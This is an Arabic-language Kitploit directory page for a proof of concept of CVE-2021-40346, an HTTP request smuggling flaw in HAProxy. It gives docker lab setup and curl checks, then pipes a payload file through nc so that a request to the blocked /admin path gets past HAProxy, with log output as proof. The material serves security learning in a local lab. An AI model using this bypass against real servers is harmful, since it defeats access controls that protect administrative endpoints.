Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40346 — CVE-2021-40346 PoC (HAProxy HTTP تهريب) | Kitploit
أدوات/GitHubGitHub/knqyf263/cve-2021-40346
تحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSاستغلال تطبيقات الويبتجاوز WAFالتعلم والتعليم
GitHubknqyf263/cve-2021-40346

CVE-2021-40346

CVE-2021-40346 PoC (HAProxy HTTP تهريب)

عرض المستودع
41153منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-40346

إثبات المفهوم CVE-2021-40346 (تهريب HTTP لـ HAProxy)

لأغراض تعليمية فقط

الإعداد

root@kitploit:~
$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4

الاختبار

تأكيد منع الوصول إلى /admin.

root@kitploit:~
$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

لن ترى /admin في السجل. ذلك يعني أن الطلب لم يصل إلى الخادم الخلفي لأن HAProxy منعه.

root@kitploit:~
$ docker logs poc
server start at port 8000
/

ثم يمكنك التأكد من إمكانية تجاوزه باستخدام payload.txt.

root@kitploit:~
$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked

6
hello

0

ستجد /admin في السجل.

root@kitploit:~
$ docker logs poc
server start at port 8000
/
/
/admin
تنزيل الأداة